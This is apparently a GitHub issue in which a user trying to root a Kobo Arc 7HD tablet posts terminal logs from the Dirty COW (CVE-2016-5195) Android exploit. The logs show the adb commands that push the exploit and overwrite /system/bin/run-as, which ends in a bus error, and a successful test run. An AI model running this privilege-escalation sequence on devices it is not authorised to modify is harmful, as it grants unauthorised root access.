Kobo Arc 7HD gives a "bus error" #106

@eloydegen

Running make root:

[eloy@t480 CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 29.5 MB/s (17880 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed, 0 skipped. 79.8 MB/s (13784 bytes in 0.000s)
adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as-original'
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: source file size (13784) and destination file size (9464) differ
         corruption?

[*] size 13784
[*] mmap 0x401f6000
[*] currently 0x401f6000=464c457f
[*] using ptrace method
[*] check thread starts, address 0x401f6000, size 13784
[*] ptrace thread starts, address 0x401f6000, size 13784
[*] madvise thread starts, address 0x401f6000, size 13784
Bus error 

However, running make test:

[eloy@t480 CVE-2016-5195]$ make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 59.9 MB/s (17880 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
test.sh: 1 file pushed, 0 skipped. 2.7 MB/s (367 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2023-12-13 23:58 test
-rwxrwxrwx shell    shell         367 2023-12-13 22:56 test.sh
-r--r--r-- shell    shell          18 2023-12-13 23:58 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x40175000
[*] currently 0x40175000=72756f79
[*] using ptrace method
[*] check thread starts, address 0x40175000, size 18
[*] ptrace thread starts, address 0x40175000, size 18
[*] madvise thread starts, address 0x40175000, size 18
[*] check thread stops, patch successful, iterations 3
[*] ptrace thread stops, return code sum 0, iterations 4047
[*] finished pid=3302 sees 0x40175000=6e6c7576
[*] madvise thread stops, return code sum 0, iterations 65420
[*] finished pid=0 sees 0x40175000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a                                  !..

What is going wrong here?
